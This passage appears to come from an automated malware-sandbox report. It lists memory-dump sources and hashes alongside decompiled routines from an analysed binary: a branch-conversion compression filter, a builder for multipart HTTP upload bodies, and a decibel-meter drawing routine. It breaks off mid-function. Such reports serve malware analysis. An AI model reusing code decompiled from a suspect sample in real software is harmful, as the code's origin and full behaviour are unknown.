                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
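                                                                                                                                                      			/* Decompiled routine. Scans the buffer at _a4 (length _a8) for bytes 0xE8/0xE9
                                                                                                                                                      			 * (x86 CALL/JMP rel32) and, when the operand's top byte is 0x00 or 0xFF, rewrites
                                                                                                                                                      			 * the 4-byte operand by adding (_a20 != 0) or subtracting (_a20 == 0) the current
                                                                                                                                                      			 * offset plus _a12 + 5. Carry-over state is kept in *_a16 and the number of bytes
                                                                                                                                                      			 * processed is returned. This is the shape of an x86 branch-conversion (BCJ) filter
                                                                                                                                                      			 * of the kind applied around compression of executable code. */
                                                                                                                                                      			E1000ABA0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, unsigned int* _a16, intOrPtr _a20) {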
                                                                                                                                                      				intOrPtr _t36;
                                                                                                                                                      				signed int _t46;
                                                                                                                                                      				unsigned int _t47;
                                                                                                                                                      				signed int _t51;
                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                      				signed char _t66;
                                                                                                                                                      				signed int _t67;
                                                                                                                                                      				signed char _t81;
                                                                                                                                                      				signed int* _t84;
                                                                                                                                                      				unsigned int _t87;
                                                                                                                                                      				void* _t88;
                                                                                                                                                      				unsigned int _t90;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				intOrPtr _t100;
                                                                                                                                                      				void* _t102;
                                                                                                                                                      
                                                                                                                                                      				_t36 = _a8;
                                                                                                                                                      				_t87 = 0;
                                                                                                                                                      				_t90 =  *_a16 & 0x00000007;
                                                                                                                                                      				if(_t36 >= 5) {
                                                                                                                                                      					_t100 = _a4;
                                                                                                                                                      					_a12 = _a12 + 5;
                                                                                                                                                      					_t56 = _t36 - 4 + _t100;
                                                                                                                                                      					_a8 = _t56;
                                                                                                                                                      					while(1) {
                                                                                                                                                      						_t84 = _t87 + _t100;
                                                                                                                                                      						if(_t84 >= _t56) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						L4:
                                                                                                                                                      						while(( *_t84 & 0x000000fe) != 0xe8) {
                                                                                                                                                      							_t84 =  &(_t84[0]);
                                                                                                                                                      							if(_t84 < _t56) {
                                                                                                                                                      								continue;
                                                                                                                                                      							}
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      						L6:
                                                                                                                                                      						_t66 = _t84 - _t87 - _t100;
                                                                                                                                                      						_t88 = _t84 - _t100;
                                                                                                                                                      						if(_t84 < _t56) {
                                                                                                                                                      							if(_t66 <= 2) {
                                                                                                                                                      								_t93 = _t90 >> _t66;
                                                                                                                                                      								if(_t93 == 0 || _t93 <= 4 && _t93 != 3 && ((( &(_t84[0]))[_t93 >> 1] & 0x000000ff) + 0x00000001 & 0x000000fe) != 0) {
                                                                                                                                                      									goto L9;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t90 = (_t93 | 0x00000008) >> 1;
                                                                                                                                                      									_t87 = _t88 + 1;
                                                                                                                                                      									continue;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t93 = 0;
                                                                                                                                                      								L9:
                                                                                                                                                      								_t67 = _t84[1] & 0x000000ff;
                                                                                                                                                      								_t10 = _t67 + 1; // 0x1
                                                                                                                                                      								if((_t10 & 0x000000fe) != 0) {
                                                                                                                                                      									_t100 = _a4;
                                                                                                                                                      									_t90 = (_t93 | 0x00000008) >> 1;
                                                                                                                                                      									_t87 = _t88 + 1;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t46 = ((_t67 << 0x00000008 | _t84[0] & 0x000000ff) << 0x00000008 | _t84[0] & 0x000000ff) << 0x00000008 | _t84[0] & 0x000000ff;
                                                                                                                                                      									_t102 = _t88 + _a12;
                                                                                                                                                      									_t87 = _t88 + 5;
                                                                                                                                                      									if(_a20 == 0) {
                                                                                                                                                      										_t47 = _t46 - _t102;
                                                                                                                                                      									} else {
                                                                                                                                                      										_t47 = _t46 + _t102;
                                                                                                                                                      									}
                                                                                                                                                      									if(_t93 != 0) {
                                                                                                                                                      										_t81 = (_t93 & 0x00000006) + (_t93 & 0x00000006) + (_t93 & 0x00000006) + (_t93 & 0x00000006);
                                                                                                                                                      										if(((_t47 >> _t81) + 0x00000001 & 0x000000fe) == 0) {
                                                                                                                                                      											_t51 = _t47 ^ (0x00000100 << _t81) - 0x00000001;
                                                                                                                                                      											if(_a20 == 0) {
                                                                                                                                                      												_t47 = _t51 - _t102;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t47 = _t51 + _t102;
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										_t56 = _a8;
                                                                                                                                                      										_t90 = 0;
                                                                                                                                                      									}
                                                                                                                                                      									_t100 = _a4;
                                                                                                                                                      									_t84[0] = _t47;
                                                                                                                                                      									_t84[0] = _t47 >> 8;
                                                                                                                                                      									_t84[0] = _t47 >> 0x10;
                                                                                                                                                      									_t84[1] =  ~(_t47 >> 0x00000018 & 0x00000001);
                                                                                                                                                      								}
                                                                                                                                                      								while(1) {
                                                                                                                                                      									_t84 = _t87 + _t100;
                                                                                                                                                      									if(_t84 >= _t56) {
                                                                                                                                                      										goto L6;
                                                                                                                                                      									}
                                                                                                                                                      									goto L4;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_t66 <= 2) {
                                                                                                                                                      							 *_a16 = _t90 >> _t66;
                                                                                                                                                      							return _t88;
                                                                                                                                                      						} else {
                                                                                                                                                      							 *_a16 = 0;
                                                                                                                                                      							return _t88;
                                                                                                                                                      						}
                                                                                                                                                      						goto L29;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				L29:
                                                                                                                                                      			}



















                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f6e3104535204d036b25ea60b2bb06fad876bb0d58240bb9f7da43aff1db0e19
                                                                                                                                                      • Instruction ID: c69431555dc7ca5ac2ce956e03469d3cc4628eaa309f351326888c29aa5a1bcb
                                                                                                                                                      • Opcode Fuzzy Hash: f6e3104535204d036b25ea60b2bb06fad876bb0d58240bb9f7da43aff1db0e19
                                                                                                                                                      • Instruction Fuzzy Hash: 7F412733B082664BE714CD2C889056DFBD1EBD61A4F0B476DD9969738AD220CC89C7C1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: b345abad6effc45c0cbb84b48b158672e45d54553e0d46f7d8c2a416a1b75d2d
                                                                                                                                                      • Instruction ID: b43c7b1bc87f947e21621f9e1e5b51c3c2753294295e3ab8e435aed6927b1f5f
                                                                                                                                                      • Opcode Fuzzy Hash: b345abad6effc45c0cbb84b48b158672e45d54553e0d46f7d8c2a416a1b75d2d
                                                                                                                                                      • Instruction Fuzzy Hash: 20317236A609164BE70CCB28DCB3AB93690E784345F89913DE94BCB3D1DE2D9900C744
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction ID: 3d64114236e2f6cf37ce8917a46a3af8ec6341702dac82c8498a2a11d88d9f97
                                                                                                                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                      • Instruction Fuzzy Hash: 18115E772041C283F680C93DD8B85ABEBDAEBC53E073943BAD0426B65CC222EE419600
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                      • Instruction ID: 422f8650b557b8f9c1a593025372a0152a0a34ea2c84febd6a26ca963c529ba3
                                                                                                                                                      • Opcode Fuzzy Hash: 93263c2f41e7a84bd9f3f1fe17f765076f141bc4a56e9309b850ac5ad24851b2
                                                                                                                                                      • Instruction Fuzzy Hash: 6821FF73D547374BE361E969DC043623392FBC4389F1A8574EE905BB4AD639AA0387D0
                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                      			E10021460(void* __ebx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr* _a36) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char* _v20;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				char _v28;
                                                                                                                                                      				char _v543;
                                                                                                                                                      				char _v544;
                                                                                                                                                      				char _v807;
                                                                                                                                                      				char _v808;
                                                                                                                                                      				char* _v812;
                                                                                                                                                      				char _v1079;
                                                                                                                                                      				char _v1080;
                                                                                                                                                      				char* _v1084;
                                                                                                                                                      				char* _v1088;
                                                                                                                                                      				char _v1599;
                                                                                                                                                      				char _v1600;
                                                                                                                                                      				intOrPtr _v1604;
                                                                                                                                                      				char _v15703;
                                                                                                                                                      				char _v15704;
                                                                                                                                                      				char* _v15708;
                                                                                                                                                      				char _v29807;
                                                                                                                                                      				char _v29808;
                                                                                                                                                      				char* _v29812;
                                                                                                                                                      				char _v43911;
                                                                                                                                                      				char _v43912;
                                                                                                                                                      				char _v58007;
                                                                                                                                                      				char _v58008;
                                                                                                                                                      				char _v58024;
                                                                                                                                                      				char _v58052;
                                                                                                                                                      				char _v58080;
                                                                                                                                                      				char _v58084;
                                                                                                                                                      				void* __esi;
                                                                                                                                                      				void* _t172;
                                                                                                                                                      				intOrPtr _t179;
                                                                                                                                                      				void* _t186;
                                                                                                                                                      				void* _t195;
                                                                                                                                                      				void* _t216;
                                                                                                                                                      				void* _t218;
                                                                                                                                                      				void* _t237;
                                                                                                                                                      				void* _t254;
                                                                                                                                                      				intOrPtr _t297;
                                                                                                                                                      				intOrPtr _t357;
                                                                                                                                                      				void* _t359;
                                                                                                                                                      				void* _t366;
                                                                                                                                                      				void* _t376;
                                                                                                                                                      				void* _t385;
                                                                                                                                                      				void* _t392;
                                                                                                                                                      
                                                                                                                                                      				_t353 = __edi;
                                                                                                                                                      				_t265 = __ebx;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022B1C);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t357;
                                                                                                                                                      				E10018AA0(0xe2d4);
                                                                                                                                                      				_push(_t354);
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				_v28 = "--";
                                                                                                                                                      				if(_a16 != 0 && _a20 != 0 && _a24 != 0 && _a28 != 0 && _a32 > 0) {
                                                                                                                                                      					_v812 = "Content-Disposition: form-data; name=\"%s\"; %s=\"%s\"";
                                                                                                                                                      					_v1084 = "Content-Type: %s";
                                                                                                                                                      					_v1088 = "%s%s\r\n%s\r\n%s\r\n\r\n";
                                                                                                                                                      					_v808 = 0;
                                                                                                                                                      					E1000CF20(__edi,  &_v807, 0, 0x103);
                                                                                                                                                      					_v1080 = 0;
                                                                                                                                                      					E1000CF20(_t353,  &_v1079, 0, 0x103);
                                                                                                                                                      					_v1600 = 0;
                                                                                                                                                      					E1000CF20(_t353,  &_v1599, 0, 0x1ff);
                                                                                                                                                      					_push(_a20);
                                                                                                                                                      					_push(_a16);
                                                                                                                                                      					E1000CC93(_t353,  &_v808, _v812, _a16);
                                                                                                                                                      					E1000CC93(_t353,  &_v1080, _v1084, _a24);
                                                                                                                                                      					_push( &_v1080);
                                                                                                                                                      					_push( &_v808);
                                                                                                                                                      					_push(_a4);
                                                                                                                                                      					E1000CC93(_t353,  &_v1600, _v1088, _v28);
                                                                                                                                                      					_t392 = _t357 + 0x5c;
                                                                                                                                                      					if( *_a36 != 0) {
                                                                                                                                                      						E1000D190(__ebx, _t353, _t354,  *_a36 + _v24,  &_v1600, E1000CAC0( &_v1600));
                                                                                                                                                      						_t392 = _t392 + 0x10;
                                                                                                                                                      					}
                                                                                                                                                      					_t254 = E1000CAC0( &_v1600);
                                                                                                                                                      					_t357 = _t392 + 4;
                                                                                                                                                      					_v24 = _t254 + _v24;
                                                                                                                                                      					if( *_a36 != 0) {
                                                                                                                                                      						E1000D190(_t265, _t353, _t354,  *_a36 + _v24, _a28, _a32);
                                                                                                                                                      						_t357 = _t357 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					_v24 = _v24 + _a32;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a8 != 0 && _a12 > 0) {
                                                                                                                                                      					_t172 = E10001A50(_a8, "=");
                                                                                                                                                      					_t357 = _t357 + 8;
                                                                                                                                                      					if(_t172 != 0) {
                                                                                                                                                      						_v15708 = "Content-Disposition: form-data; name=\"%s\"";
                                                                                                                                                      						_v29812 = "\r\n%s%s\r\n%s\r\n\r\n%s";
                                                                                                                                                      						_v58008 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v58007, 0, 0x370f);
                                                                                                                                                      						_v29808 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v29807, 0, 0x370f);
                                                                                                                                                      						_v43912 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v43911, 0, 0x370f);
                                                                                                                                                      						_v15704 = 0;
                                                                                                                                                      						E1000CF20(_t353,  &_v15703, 0, 0x370f);
                                                                                                                                                      						_t179 = E10001A50(_a8, "&");
                                                                                                                                                      						_t366 = _t357 + 0x38;
                                                                                                                                                      						_v1604 = _t179;
                                                                                                                                                      						if(_v1604 != 0) {
                                                                                                                                                      							E10001160( &_v58052, __eflags, _a8);
                                                                                                                                                      							_v8 = 0;
                                                                                                                                                      							E10002FE0( &_v58024, __eflags);
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      							E10001160( &_v58080, __eflags, "&");
                                                                                                                                                      							_v8 = 2;
                                                                                                                                                      							E1001A850(__eflags,  &_v58052,  &_v58024,  &_v58080);
                                                                                                                                                      							_t357 = _t366 + 0xc;
                                                                                                                                                      							_v58084 = 0;
                                                                                                                                                      							while(1) {
                                                                                                                                                      								_t186 = E100021E0( &_v58024);
                                                                                                                                                      								__eflags = _v58084 - _t186;
                                                                                                                                                      								if(_v58084 >= _t186) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								E1000CF20(_t353,  &_v43912, 0, 0x3710);
                                                                                                                                                      								E1000CF20(_t353,  &_v15704, 0, 0x3710);
                                                                                                                                                      								_t195 = E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=");
                                                                                                                                                      								_t354 = _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084));
                                                                                                                                                      								E1000D190(_t265, _t353, _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)),  &_v43912, E100011E0(E10003030( &_v58024, __eflags, _v58084)), _t195 - E100011E0(E10003030( &_v58024, __eflags, _v58084)));
                                                                                                                                                      								E1000D8A3(_v58084,  &_v15704, 0x3710, E10001A50(E100011E0(E10003030( &_v58024, __eflags, _v58084)), "=") + 1);
                                                                                                                                                      								E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                      								E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                      								E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                      								_push( &_v15704);
                                                                                                                                                      								_push( &_v58008);
                                                                                                                                                      								_push(_a4);
                                                                                                                                                      								E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                      								_t376 = _t357 + 0x7c;
                                                                                                                                                      								__eflags =  *_a36;
                                                                                                                                                      								if( *_a36 != 0) {
                                                                                                                                                      									_t218 = E1000CAC0( &_v29808);
                                                                                                                                                      									__eflags =  *_a36 + _v24;
                                                                                                                                                      									E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, _t218);
                                                                                                                                                      									_t376 = _t376 + 0x10;
                                                                                                                                                      								}
                                                                                                                                                      								_t216 = E1000CAC0( &_v29808);
                                                                                                                                                      								_t357 = _t376 + 4;
                                                                                                                                                      								_v24 = _t216 + _v24;
                                                                                                                                                      								_t297 = _v58084 + 1;
                                                                                                                                                      								__eflags = _t297;
                                                                                                                                                      								_v58084 = _t297;
                                                                                                                                                      							}
                                                                                                                                                      							_v8 = 1;
                                                                                                                                                      							E100011A0( &_v58080);
                                                                                                                                                      							_v8 = 0;
                                                                                                                                                      							E10003010( &_v58024);
                                                                                                                                                      							_v8 = 0xffffffff;
                                                                                                                                                      							E100011A0( &_v58052);
                                                                                                                                                      						} else {
                                                                                                                                                      							E1000D190(_t265, _t353, _t354,  &_v43912, _a8, E10001A50(_a8, "=") - _a8);
                                                                                                                                                      							E1000D8A3(_a8,  &_v15704, 0x3710, E10001A50(_a8, "=") + 1);
                                                                                                                                                      							E1000CF20(_t353,  &_v58008, 0, 0x3710);
                                                                                                                                                      							E1000CF20(_t353,  &_v29808, 0, 0x3710);
                                                                                                                                                      							E1000CC93(_t353,  &_v58008, _v15708,  &_v43912);
                                                                                                                                                      							_push( &_v15704);
                                                                                                                                                      							_push( &_v58008);
                                                                                                                                                      							_push(_a4);
                                                                                                                                                      							E1000CC93(_t353,  &_v29808, _v29812, _v28);
                                                                                                                                                      							_t385 = _t366 + 0x64;
                                                                                                                                                      							if( *_a36 != 0) {
                                                                                                                                                      								E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v29808, E1000CAC0( &_v29808));
                                                                                                                                                      								_t385 = _t385 + 0x10;
                                                                                                                                                      							}
                                                                                                                                                      							_t237 = E1000CAC0( &_v29808);
                                                                                                                                                      							_t357 = _t385 + 4;
                                                                                                                                                      							_v24 = _t237 + _v24;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_v20 = "\r\n%s%s%s\r\n";
                                                                                                                                                      				_v544 = 0;
                                                                                                                                                      				E1000CF20(_t353,  &_v543, 0, 0x1ff);
                                                                                                                                                      				_push(_v28);
                                                                                                                                                      				_push(_a4);
                                                                                                                                                      				E1000CC93(_t353,  &_v544, _v20, _v28);
                                                                                                                                                      				_t359 = _t357 + 0x20;
                                                                                                                                                      				if( *_a36 != 0) {
                                                                                                                                                      					E1000D190(_t265, _t353, _t354,  *_a36 + _v24,  &_v544, E1000CAC0( &_v544));
                                                                                                                                                      					_t359 = _t359 + 0x10;
                                                                                                                                                      				}
                                                                                                                                                      				_v24 = E1000CAC0( &_v544) + _v24;
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}

                                                                                                                                                      0x10021a88
                                                                                                                                                      0x10021a91
                                                                                                                                                      0x10021ab3
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021ab8
                                                                                                                                                      0x10021acd
                                                                                                                                                      0x10021ad6
                                                                                                                                                      0x10021ae1

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$_sprintf_strlen$_strcpy_s$__flsbuf__output_l
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 854390245-0
                                                                                                                                                      • Opcode ID: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction ID: 2d82e108429a1e59b14db5b6321f6623d8f234d0aa847db4e2dbab4e051ccd9c
                                                                                                                                                      • Opcode Fuzzy Hash: 910685c5451b4cc4cbd4e9e1085cb89c7aa0c32abf0c4b0acda8ecd3dc8b06fe
                                                                                                                                                      • Instruction Fuzzy Hash: BC0290B6D00218ABDB10DB90DC82FDE777DEB58340F4445A8F509A7285EB74AB44CFA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 71%
                                                                                                                                                      			E00401390(signed long long __fp0) {
                                                                                                                                                      				void* __ebx;
                                                                                                                                                      				void* _t79;
                                                                                                                                                      				signed long long _t87;
                                                                                                                                                      				signed char _t88;
                                                                                                                                                      				signed long long _t89;
                                                                                                                                                      				int _t94;
                                                                                                                                                      				int _t97;
                                                                                                                                                      				int _t115;
                                                                                                                                                      				int _t118;
                                                                                                                                                      				void* _t126;
                                                                                                                                                      				int _t127;
                                                                                                                                                      				int _t142;
                                                                                                                                                      				signed char _t156;
                                                                                                                                                      				void* _t159;
                                                                                                                                                      				struct HDC__* _t162;
                                                                                                                                                      				signed long long _t163;
                                                                                                                                                      				signed long long* _t164;
                                                                                                                                                      				signed long long* _t165;
                                                                                                                                                      				long long* _t166;
                                                                                                                                                      
                                                                                                                                                      				_t172 = __fp0;
                                                                                                                                                      				_t126 = SelectObject;
                                                                                                                                                      				_t163 = _t164[0x17];
                                                                                                                                                      				_t162 = _t164[0x18];
                                                                                                                                                      				_t79 = SelectObject(_t162,  *(_t163 + 0x18));
                                                                                                                                                      				_t127 =  *(_t163 + 0x20);
                                                                                                                                                      				_t164[5] = _t79;
                                                                                                                                                      				_t164[7] = SelectObject(_t162, _t127);
                                                                                                                                                      				_t164[7] = SelectObject(_t162, GetStockObject(8));
                                                                                                                                                      				SetBkMode(_t162, 1);
                                                                                                                                                      				SetTextColor(_t162, 0);
                                                                                                                                                      				_t164[3] = 0x19;
                                                                                                                                                      				_t164[3] = 0x96;
                                                                                                                                                      				_t164[4] = 0xaf;
                                                                                                                                                      				_t164[4] = 0xa7;
                                                                                                                                                      				_t142 = _t163 + 0x84;
                                                                                                                                                      				if( *((intOrPtr*)(_t163 + 0x28)) != 0) {
                                                                                                                                                      					_t164[2] = _t142;
                                                                                                                                                      					_t164[5] = 8;
                                                                                                                                                      					do {
                                                                                                                                                      						_t87 =  *(_t164[2]);
                                                                                                                                                      						_t164[6] = _t87;
                                                                                                                                                      						if(_t87 <= 1) {
                                                                                                                                                      							_t164[2] = 0xc3140000;
                                                                                                                                                      						} else {
                                                                                                                                                      							asm("fild dword [esp+0x34]");
                                                                                                                                                      							asm("fldlg2");
                                                                                                                                                      							asm("fxch st0, st1");
                                                                                                                                                      							asm("fyl2x");
                                                                                                                                                      							_t164[2] = _t172 *  *0x40b200 *  *0x40b1f8;
                                                                                                                                                      						}
                                                                                                                                                      						_t88 = E00403774();
                                                                                                                                                      						_t156 = _t88;
                                                                                                                                                      						if(_t156 >= 0) {
                                                                                                                                                      							if(_t156 <= 0x96) {
                                                                                                                                                      								if(_t156 > 0) {
                                                                                                                                                      									goto L17;
                                                                                                                                                      								}
                                                                                                                                                      							} else {
                                                                                                                                                      								_t156 = 0x96;
                                                                                                                                                      								L17:
                                                                                                                                                      								SelectObject(_t162,  *(_t163 + 0x24));
                                                                                                                                                      								_t52 = _t164[3] + 1; // 0x1
                                                                                                                                                      								_t127 = _t156 + _t52;
                                                                                                                                                      								_t88 = Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
                                                                                                                                                      							}
                                                                                                                                                      							if(_t156 < 0x96) {
                                                                                                                                                      								goto L19;
                                                                                                                                                      							}
                                                                                                                                                      						} else {
                                                                                                                                                      							_t156 = 0;
                                                                                                                                                      							L19:
                                                                                                                                                      							SelectObject(_t162,  *(_t163 + 0x20));
                                                                                                                                                      							_t127 = _t164[3];
                                                                                                                                                      							_t88 = Rectangle(_t162, _t156 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
                                                                                                                                                      						}
                                                                                                                                                      						_t172 = _t164[2];
                                                                                                                                                      						asm("fcomp dword [0x40b1ec]");
                                                                                                                                                      						asm("fnstsw ax");
                                                                                                                                                      						if((_t88 & 0x00000041) != 0) {
                                                                                                                                                      							_t89 = "-inf db"; // 0x666e692d
                                                                                                                                                      							_t127 =  *0x40d1d4; // 0x626420
                                                                                                                                                      							_t164[7] = _t89;
                                                                                                                                                      							_t164[8] = _t127;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t172 = _t164[2];
                                                                                                                                                      							_t165 = _t164 - 8;
                                                                                                                                                      							 *_t165 = _t172;
                                                                                                                                                      							_push("%0.1f db");
                                                                                                                                                      							_push( &(_t165[8]));
                                                                                                                                                      							E004036D0(_t126,  &(_t165[8]));
                                                                                                                                                      							_t164 =  &(_t165[2]);
                                                                                                                                                      						}
                                                                                                                                                      						asm("repne scasb");
                                                                                                                                                      						DrawTextA(_t162,  &(_t164[8]),  !(_t127 | 0xffffffff) - 1,  &(_t164[3]), 0x25);
                                                                                                                                                      						_t94 = _t164[3] + 0x11;
                                                                                                                                                      						_t127 = _t164[2] + 4;
                                                                                                                                                      						_t164[3] = _t94;
                                                                                                                                                      						_t164[4] = _t94 + 0x11;
                                                                                                                                                      						_t97 = _t164[5] - 1;
                                                                                                                                                      						_t164[2] = _t127;
                                                                                                                                                      						_t164[5] = _t97;
                                                                                                                                                      					} while (_t97 != 0);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t164[2] = _t142;
                                                                                                                                                      					_t164[5] = 8;
                                                                                                                                                      					do {
                                                                                                                                                      						asm("fild dword [eax]");
                                                                                                                                                      						asm("fst dword [esp+0x14]");
                                                                                                                                                      						_t159 = E00403774();
                                                                                                                                                      						if(_t159 > 0) {
                                                                                                                                                      							SelectObject(_t162,  *(_t163 + 0x24));
                                                                                                                                                      							_t22 = _t164[3] + 1; // 0x1
                                                                                                                                                      							_t127 = _t159 + _t22;
                                                                                                                                                      							Rectangle(_t162, _t164[3], _t164[4], _t127, _t164[4]);
                                                                                                                                                      						}
                                                                                                                                                      						if(_t159 < 0x96) {
                                                                                                                                                      							SelectObject(_t162,  *(_t163 + 0x20));
                                                                                                                                                      							_t127 = _t164[3];
                                                                                                                                                      							Rectangle(_t162, _t159 + _t127, _t164[3], _t164[4] + 1, _t164[4]);
